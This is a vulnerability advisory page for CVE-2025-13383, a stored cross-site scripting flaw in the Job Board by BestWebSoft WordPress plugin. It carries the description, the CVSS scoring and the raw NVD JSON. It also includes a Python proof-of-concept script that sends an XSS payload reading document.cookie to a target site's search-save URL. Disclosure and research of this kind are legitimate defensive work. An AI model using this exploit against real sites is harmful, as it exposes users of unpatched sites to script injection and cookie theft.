Security Vulnerability Report
中文
CVE-2025-13383 CVSS 6.1 MEDIUM

CVE-2025-13383

Published: 2025-11-25 08:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Job Board by BestWebSoft plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.2.1. This is due to the plugin storing the entire unsanitized `$_GET` superglobal array directly into the database via `update_user_meta()` when users save search results, and later outputting this data without proper escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute whenever a user accesses the saved search or views their profile, granted they can trick the user into performing the search and saving the results.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Job Board by BestWebSoft插件 <= 1.2.1(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import urllib.parse # CVE-2025-13383 PoC - Stored XSS in Job Board by BestWebSoft plugin # Target: WordPress site with Job Board plugin <= 1.2.1 target_url = "http://target-wordpress-site.com/" # Construct malicious XSS payload xss_payload = "<script>alert(document.cookie)</script>" encoded_payload = urllib.parse.quote(xss_payload) # Step 1: Craft malicious search URL with XSS payload malicious_url = f"{target_url}?s={encoded_payload}&job-board-search=Save+Search" # Step 2: Send request to save search with XSS payload # This will store the unsanitized $_GET data via update_user_meta() print(f"[*] Sending malicious request to: {malicious_url}") response = requests.get(malicious_url, allow_redirects=True) # Step 3: When any user views the saved search or profile, # the XSS payload will execute in their browser if response.status_code == 200: print("[+] Malicious search saved successfully") print("[+] XSS payload stored in database") print("[+] Payload will execute when users view saved searches") else: print("[-] Failed to save malicious search")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13383", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:50.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Job Board by BestWebSoft plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.2.1. This is due to the plugin storing the entire unsanitized `$_GET` superglobal array directly into the database via `update_user_meta()` when users save search results, and later outputting this data without proper escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute whenever a user accesses the saved search or views their profile, granted they can trick the user into performing the search and saving the results."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/job-board/tags/1.2.1/job-board.php#L1680", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/job-board/tags/1.2.1/job-board.php#L2354", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/job-board/tags/1.2.1/job-board.php#L2355", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3403205/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1eb1622f-19fb-472e-871b-9a456f80f390?source=cve", "source": "[email protected]"}]}}